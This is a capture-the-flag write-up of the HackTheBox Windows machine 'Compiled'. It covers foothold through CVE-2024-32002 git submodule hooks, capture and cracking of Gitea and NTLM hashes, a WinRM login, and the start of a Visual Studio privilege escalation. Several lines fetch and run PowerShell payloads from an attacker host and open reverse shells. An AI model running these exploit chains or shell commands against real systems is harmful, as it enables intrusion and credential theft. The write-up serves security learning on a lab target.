# Compiled

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Compiled is a decent medium-rated Windows machine created by [ruycr4ft](https://app.hackthebox.com/users/1253217) and [YukaFake](https://app.hackthebox.com/users/1361621).

The foothold involves the exploitation of CVE-2024-32002 on `git`.  
Afterwards, we need to crack a gitea hash.  
Finally, Visual Studio's `VSStandardCollectorService150` (CVE-2024-20656) leads to EoP.

## Initial enumeration

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.26
Nmap scan report for 10.10.11.26
Host is up (0.27s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE
3000/tcp open  ppp
5000/tcp open  upnp
5985/tcp open  wsman
7680/tcp open  pando-pub
```

```console
opcode@debian$ nmap -sC -sV -p 3000,5000,5985,7680 -oN compiled.nmap 10.10.11.26
Nmap scan report for 10.10.11.26
Host is up (0.15s latency).

PORT     STATE SERVICE    VERSION
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=c9c8cc59f913bcd0; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=P2qEmi5ZEvUBaaGgx06EtR3psbQ6MTcyMjEwNzcwNDA0MTU4MDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 19:15:04 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=df19a606340adb6c; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=uq2sEt7jbeHQhpOBfO3S_c3r32k6MTcyMjEwNzcwOTg0NjQyNTEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 19:15:09 GMT
|_    Content-Length: 0
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Sat, 27 Jul 2024 19:15:04 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|     <!-- Bootstrap CSS -->
|     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|     <!-- Custom CSS -->
|     <style>
|     your custom CSS here */
|     body {
|     font-family: 'Ubuntu Mono', monospace;
|     background-color: #272822;
|     color: #ddd;
|     .jumbotron {
|     background-color: #1e1e1e;
|     color: #fff;
|     padding: 100px 20px;
|     margin-bottom: 0;
|     .services {
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub?
```

## (Failed) RCE with `PreBuildEvent`

The website on <http://10.10.11.26:5000/> allows us to compile any code.  
Just like the machine Visual, I created a Hello World C# Console App and added a post-build event:

```xml
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001" />
  </Target>

</Project>
```

We don't need to host our own gitea site, as an instance is already running on <http://10.10.11.26:3000/>  
I registered an account with `opcode:opcodess` and made the repo. I added the URL on <http://10.10.11.26:5000/> but never received a callback.  
I suspected it to be a version mismatch.

Under `/explore/repos` a couple of repositories are present: A random calculator app (Calculator) and the source for flask application hosting the frontend of the compilation service (Compiled).  
I repurposed that calculator app with a pre-build event but didn't receive a callback.

If we start responder and submit `http://10.10.14.185/opcode.git`, we'd receive `Richard`'s encrypted Net-NTLMv2 challenge:

```text
[HTTP] Sending NTLM authentication request to 10.10.11.26
[HTTP] GET request from: ::ffff:10.10.11.26  URL: /.git/
[HTTP] NTLMv2 Client   : 10.10.11.26
[HTTP] NTLMv2 Username : COMPILED\Richard
[HTTP] NTLMv2 Hash     : Richard::COMPILED:6f02b5aea91f6f73:C6215AE3EB86AA84A6B598CF45CD05C2:010100000000000064E4E95D71E0DA0186258BC404C269FA0000000002000800520030005300430001001E00570049004E002D0057004F003100340050004D004F0032004800300057000400140052003000530043002E004C004F00430041004C0003003400570049004E002D0057004F003100340050004D004F0032004800300057002E0052003000530043002E004C004F00430041004C000500140052003000530043002E004C004F00430041004C000800300030000000000000000000000000200000CAB8E93EA3D53F49B19B3AF87CA516811DC39A18046332C56FB260B5C183740D0A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00310036000000000000000000
```

However, the corresponding password is not present in `rockyou.txt`.

## RCE with git submodules

On <http://10.10.11.26:3000/richard/Calculator>, there's a notable bit in `README.md`:

```console
C:\Users\Richard> git --version
git version 2.45.0.windows.1
C:\Users\Richard>
```

The version has a well-known vulnerability: [CVE-2024-32002](https://amalmurali.me/posts/git-rce/)

> Repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule’s worktree but into a .git/ directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed.

Moreover, in the `README.md` the example command clones submodules as well:

```console
git clone --recursive http://gitea.compiled.htb:3000/richard/Calculator.git
```

I updated `/etc/hosts`:

```text
10.10.11.26 compiled.htb gitea.compiled.htb
```

On gitea, I created a new repo called `hook` and got its URL: <http://gitea.compiled.htb:3000/opcode/hook.git>  
On a side note, the SSH URL is `COMPILED\Richard@gitea.compiled.htb:opcode/hook.git`.

Then, I ran the commands according to the PoC for CVE-2024-32002.

```shell
git init hook && cd hook
mkdir -p y/hooks
echo -e '#!bin/sh\npowershell -exec bypass -c "IEX(IWR http://10.10.14.185:8000/shells/shell_wstderr.ps1 -UseBasicParsing)"' > y/hooks/post-checkout
git add y/hooks/post-checkout
git update-index --chmod=+x y/hooks/post-checkout
git config user.email 'opcode@opcode.htb'
git config user.name 'Opcode'
git commit -m 'post-checkout'
git remote add origin http://gitea.compiled.htb:3000/opcode/hook.git
git push -u origin main
cd ..
```

Then I created another gitea repo `captain` and got its URL: <http://gitea.compiled.htb:3000/opcode/captain.git>  

```shell
git init captain && cd captain
git submodule add --name x/y http://gitea.compiled.htb:3000/opcode/hook.git A/modules/x
git commit -m 'add-submodule'
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git config user.email 'opcode@opcode.htb'
git config user.name 'Opcode'
git commit -m 'add-symlink'
git remote add origin http://gitea.compiled.htb:3000/opcode/captain.git
git push -u origin main
```

This time, I submitted the URL `http://gitea.compiled.htb:3000/opcode/captain.git`

```console
opcode@debian$ curl -X POST 'http://compiled.htb:5000/' -d 'repo_url=http://gitea.compiled.htb:3000/opcode/captain.git'
```

There were too many gotchas for the exploit chain.  
I was using the shebang `#!/usr/bin/env powershell` to run powershell. However, only `#!bin/sh` worked.  
Only the `post-checkout` hook worked, but I can't rationalize why.  
I think `IEX` was not functional without `-ExecutionPolicy bypass`.  
Furthermore, some of my attempts disappeared into thin air, and I had to spam my submissions.

I upgraded my shell to ConPtyShell using [ConPtyReflect](https://github.com/int3x/ConPtyReflect):

```console
C:\> IEX(IWR http://10.10.14.185:8000/ConPtyReflect.ps1 -UseBasicParsing)
C:\> Invoke-ConPtyReflect 10.10.14.185 9001
```

## Post shell enumeration (Git Bash)

Git installation on Windows comes packaged with Git Bash, which is an MSYS2-based environment that includes MinGW-w64 tools, providing a Unix-like experience on Windows.

```console
PS C:\> id
uid=197610(Richard) gid=197121 groups=197121
```

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       916
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4   
  TCP    0.0.0.0:3000           0.0.0.0:0              LISTENING       5980
  TCP    0.0.0.0:5000           0.0.0.0:0              LISTENING       4196
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5356
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4   
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       3592
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4   
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       692 
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       532 
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       912 
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1332
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2092
  TCP    0.0.0.0:49869          0.0.0.0:0              LISTENING       672 
  TCP    10.10.11.26:139       0.0.0.0:0              LISTENING       4
```

It is a workstation/server, not a domain controller.  
I'm curious about port 5040:

```console
PS C:\> (IWR http://127.0.0.1:5040 -UseBasicParsing).Headers
```

It hung when I ran that command.

I also ran [PrivescCheck](https://github.com/itm4n/PrivescCheck), expecting a lot of options to fail:

```console
PS C:\> IEX(IWR http://10.10.14.185:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\> Invoke-PrivescCheck -Extended
```

However, it ran smoothly:

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ User groups                                       ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the groups the current user belongs to ┃
┃ (name, type, SID).                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

Name                                         Type           SID
----                                         ----           ---
COMPILED\Ninguno                             Group          S-1-5-21-4093338461-994521390-3704224775-513
Todos                                        WellKnownGroup S-1-1-0
BUILTIN\Performance Log Users                Alias          S-1-5-32-559
BUILTIN\Users                                Alias          S-1-5-32-545
NT AUTHORITY\BATCH                           WellKnownGroup S-1-5-3
INICIO DE SESIÓN EN LA CONSOLA               WellKnownGroup S-1-2-1
NT AUTHORITY\Usuarios autentificados         WellKnownGroup S-1-5-11
NT AUTHORITY\Esta compañía                   WellKnownGroup S-1-5-15
NT AUTHORITY\Cuenta local                    WellKnownGroup S-1-5-113
LOCAL                                        WellKnownGroup S-1-2-0
NT AUTHORITY\LogonSessionId_0_35687732       LogonSession   S-1-5-5-0-35687732
NT AUTHORITY\Autenticación NTLM              WellKnownGroup S-1-5-64-10
Etiqueta obligatoria\Nivel obligatorio medio Label          S-1-16-8192
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ User privileges                                   ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has privileges (e.g.,         ┃
┃ SeImpersonatePrivilege) that can be leveraged for privilege  ┃
┃ escalation to SYSTEM.                                        ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational (not vulnerable)

Name                          State    Description                          Exploitable
----                          -----    -----------                          -----------
SeShutdownPrivilege           Disabled Shut down the system                       False
SeChangeNotifyPrivilege       Enabled  Bypass traverse checking                   False
SeUndockPrivilege             Disabled Remove computer from docking station       False
SeIncreaseWorkingSetPrivilege Disabled Increase a process working set             False
SeTimeZonePrivilege           Disabled Change the time zone                       False
```

`whoami /all` did not work, but PrivescCheck managed to retrieve it.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Non-default services                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Name        : Gitea
DisplayName : Gitea
ImagePath   : "C:\Program Files\gitea\gitea.exe" web --config "C:\Program Files\gitea\custom\conf\app.ini"
User        : .\Richard
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Automatic
```

Gitea config might be valuable.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

Name                          FullName
----                          --------
Application Verifier          C:\Program Files (x86)\Application Verifier
Microsoft                     C:\Program Files (x86)\Microsoft
Microsoft SDKs                C:\Program Files (x86)\Microsoft SDKs
Microsoft Visual Studio       C:\Program Files (x86)\Microsoft Visual Studio
Community                     C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
Application                   C:\Program Files (x86)\Microsoft\Edge\Application
Application                   C:\Program Files (x86)\Microsoft\EdgeWebView\Application
Windows Kits                  C:\Program Files (x86)\Windows Kits
Application Verifier          C:\Program Files\Application Verifier
Git                           C:\Program Files\Git
Gitea                         C:\Program Files\Gitea
Microsoft Update Health Tools C:\Program Files\Microsoft Update Health Tools
Python312                     C:\Program Files\Python312
RUXIM                         C:\Program Files\RUXIM
VMware                        C:\Program Files\VMware
VMware Tools                  C:\Program Files\VMware\VMware Tools
```

Lots of non-default applications to look for.

## Gitea configuration and cracking hash

```console
PS C:\Program Files\Gitea\custom\conf> cat .\app.ini
RUN_USER = COMPILED\Richard
APP_NAME = Git
RUN_MODE = prod
WORK_PATH = C:\Program Files\gitea

[ui]
DEFAULT_THEME = arc-green

[database]
DB_TYPE = sqlite3
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
PASSWD =
SCHEMA =
SSL_MODE = disable
PATH = C:\Program Files\gitea\data\gitea.db
LOG_SQL = false

[repository]
ROOT = C:/Program Files/gitea/data/gitea-repositories

[server]
SSH_DOMAIN = gitea.compiled.htb
DOMAIN = gitea.compiled.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.compiled.htb:3000/
APP_DATA_PATH = C:\Program Files\gitea/data
DISABLE_SSH = false
SSH_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = ten8FWelzw36S77bYSUGlVCmrZn4jncN1ekaH1NoXO4
OFFLINE_MODE = false

[--SNIP--]

[security]
INSTALL_LOCK = true
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MTY0MDEzMDR9.oQ3gsIgAi1_JTKKbw0lCKjwfcB3v7HvH6Wzb6M7dkE0
PASSWORD_HASH_ALGO = pbkdf2

[oauth2]
JWT_SECRET = XCXy54fFBqA-KAHA0Cjn5wp1gO4l-LY2-qgCS58VJO0
```

There are no other repositories:

```console
PS C:\Program Files\Gitea\data\gitea-repositories> ls


    Directory: C:\Program Files\Gitea\data\gitea-repositories


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/29/2024  12:47 AM                opcode
d-----          7/4/2024  12:39 PM                richard
```

To transfer the sqlite3 database, I started a Python server:

```console
PS C:\Program Files\Gitea\data> python -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
```

And downloaded it on my VM:

```console
opcode@debian$ wget compiled.htb:8000/gitea.db
```

We can explore the database:

```console
opcode@debian$ sqlite3 gitea.db                                
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
access                     org_user                 
access_token               package                  
action                     package_blob             
action_artifact            package_blob_upload      
[--SNIP--]      
milestone                  user_redirect            
mirror                     user_setting             
notice                     version                  
notification               watch                    
oauth2_application         webauthn_credential      
oauth2_authorization_code  webhook                  
oauth2_grant             
```

The user table is always important:

```console
sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|opcode|opcode||opcode@opcode.htb|0|enabled|4f9e189033e6da8a638a76205498a6ac41cc844e3a4e6060ae051a1a8f116ea609f502190347134dff93a11979e7c183a218|pbkdf2$50000$50|0|0|0||0|||1d8a94da01421487aa844fd6a20eac0f|b122372beee2831ebfcc96478e6684b7|en-US||1722196547|1722206820|1722196547|0|-1|1|0|0|0|0|1|0||opcode@opcode.htb|0|0|0|0|2|0|0|0|0|unified|arc-green|0
```

```console
sqlite> .schema user
CREATE TABLE `user` (`id` INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, `lower_name` TEXT NOT NULL, `name` TEXT NOT NULL, `full_name` TEXT NULL, `email` TEXT NOT NULL, `keep_email_private` INTEGER NULL, `email_notifications_preference` TEXT DEFAULT 'enabled' NOT NULL, `passwd` TEXT NOT NULL, `passwd_hash_algo` TEXT DEFAULT 'argon2' NOT NULL, `must_change_password` INTEGER DEFAULT 0 NOT NULL, `login_type` INTEGER NULL, `login_source` INTEGER DEFAULT 0 NOT NULL, `login_name` TEXT NULL, `type` INTEGER NULL, `location` TEXT NULL, `website` TEXT NULL, `rands` TEXT NULL, `salt` TEXT NULL, `language` TEXT NULL, `description` TEXT NULL, `created_unix` INTEGER NULL, `updated_unix` INTEGER NULL, `last_login_unix` INTEGER NULL, `last_repo_visibility` INTEGER NULL, `max_repo_creation` INTEGER DEFAULT -1 NOT NULL, `is_active` INTEGER NULL, `is_admin` INTEGER NULL, `is_restricted` INTEGER DEFAULT 0 NOT NULL, `allow_git_hook` INTEGER NULL, `allow_import_local` INTEGER NULL, `allow_create_organization` INTEGER DEFAULT 1 NULL, `prohibit_login` INTEGER DEFAULT 0 NOT NULL, `avatar` TEXT NOT NULL, `avatar_email` TEXT NOT NULL, `use_custom_avatar` INTEGER NULL, `num_followers` INTEGER NULL, `num_following` INTEGER DEFAULT 0 NOT NULL, `num_stars` INTEGER NULL, `num_repos` INTEGER NULL, `num_teams` INTEGER NULL, `num_members` INTEGER NULL, `visibility` INTEGER DEFAULT 0 NOT NULL, `repo_admin_change_team_access` INTEGER DEFAULT 0 NOT NULL, `diff_view_style` TEXT DEFAULT '' NOT NULL, `theme` TEXT DEFAULT '' NOT NULL, `keep_activity_private` INTEGER DEFAULT 0 NOT NULL);
CREATE UNIQUE INDEX `UQE_user_lower_name` ON `user` (`lower_name`);
CREATE UNIQUE INDEX `UQE_user_name` ON `user` (`name`);
CREATE INDEX `IDX_user_created_unix` ON `user` (`created_unix`);
CREATE INDEX `IDX_user_updated_unix` ON `user` (`updated_unix`);
CREATE INDEX `IDX_user_last_login_unix` ON `user` (`last_login_unix`);
CREATE INDEX `IDX_user_is_active` ON `user` (`is_active`);
```

I had encountered a similar hash on the box Health (it had Gogs instead of Gitea).  
`john` refuses to work with it, and using `hashcat` is the only way to crack them.  
The number of iterations is quite high, so they are not meant to be cracked in the first place. I asked for a hint and learnt that Emily's hash is meant to be cracked:

```console
opcode@debian$ python3 -c "print(__import__('base64').b64encode(bytes.fromhex('227d873cca89103cd83a976bdac52486')).decode())"
In2HPMqJEDzYOpdr2sUkhg==

opcode@debian$ python3 -c "print(__import__('base64').b64encode(bytes.fromhex('97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16')).decode())"
l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=
```

I formatted the hash to:

```text
sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=
```

```console
opcode@debian$ ./hashcat.bin -m 10900 ~/hash ~/CTF/wordlists/rockyou.txt
```

It cracks to `12345678`.

```console
PS C:\> net user emily
User name                    Emily
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/24/2024 6:37:32 PM
Password expires             Never
Password changeable          5/24/2024 6:37:32 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/28/2024 9:48:28 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users
Global Group memberships     *Ninguno
The command completed successfully.
```

Emily is a member of `Remote Management Users` group, and port 5985 is open.  
Therefore, we can get a WinRM shell as Emily:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@81ef178f30b9:~# nxc winrm 10.10.11.26 -d compiled.htb -u Emily -p 12345678 -X 'IEX(IWR http://10.10.14.185:8000/ConPtyReflect.ps1 -UseBasicParsing); Invoke-ConPtyReflect 10.10.14.185 9001'
```

## Post shell enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name      SID
============== =============================================
compiled\emily S-1-5-21-4093338461-994521390-3704224775-1001


GROUP INFORMATION
-----------------

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
```

Nothing useful here.  
I ran [PrivescCheck](https://github.com/itm4n/PrivescCheck) again:

```console
PS C:\> IEX(IWR http://10.10.14.185:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\> Invoke-PrivescCheck -Extended
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ User sessions                                     ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the currently logged-on users. Note    ┃
┃ that it might be possible to capture or relay the            ┃
┃ NTLM/Kerberos authentication of these users (RemotePotato0,  ┃
┃ KrbRelay).                                                   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

SessionName UserName       Id  State
----------- --------       --  -----
Console     COMPILED\Emily  1 Active
```

Besides the current WinRM session (which runs with ID 0), `Emily` has another session with ID 1  
I used [adopt](https://github.com/xct/adopt) to get a session 1 process.  
Subsequently, I used [rcat](https://github.com/xct/rcat) for reverse shell and [scr](https://github.com/xct/scr) for screenshots.

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/xct/adopt.exe -o adopt.exe
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/xct/scr.exe -o scr.exe
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/xct/rcat.exe -o rcat_10.10.14.185_9001.exe
```

Trying to spawn a session 1 process:

```console
PS C:\Windows\Tasks> .\adopt.exe explorer.exe C:\\Windows\\Tasks\\rcat_10.10.14.185_9001.exe
[>] Target pid is 5548
[>] ShellExecuteExW is at 00007FF9266BDE80
[>] Thread running, done! (Handle: 208)
```

I also started a Python server in `C:\Windows\Tasks` on session 0 to download screenshots:

```console
PS C:\Windows\Tasks> python -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
```

Attempting to get a screenshot:

```console
PS C:\Windows\Tasks> .\scr.exe
```

I took multiple screenshots over several minutes, but they all came up the same. I got no information other than some minimized process is running.

![1](images/1.png)

I also tried [SharpLogger](https://github.com/djhohnstein/SharpLogger) and WinPEAS to no avail.

## Privilege escalation with Visual Studio's `VSStandardCollectorService150` (CVE-2024-20656)

I was hinted to check the version of Visual Studio, but I could not find a straight answer to do the same on the internet.  
However, I verified on my machine that the version shows up whenever `Developer PowerShell for VS` opens up.  
I found the Start Menu shortcut for `Developer PowerShell for VS` and read its contents:

```console
PS C:\> $WshShell = New-Object -ComObject WScript.Shell
PS C:\> $Shortcut = $WshShell.CreateShortcut("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2019\Visual Studio Tools\Developer PowerShell for VS 2019 (2).lnk")
PS C:\> $Shortcut.TargetPath
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PS C:\> $Shortcut.Arguments
-noe -c "&{Import-Module """C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Microsoft.VisualStudio.DevShell.dll"""; Enter-VsDevShell 84a1ffb2}"
```

I tried repeating the same:

```console
PS C:\> Import-Module "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Microsoft.VisualStudio.DevShell.dll"
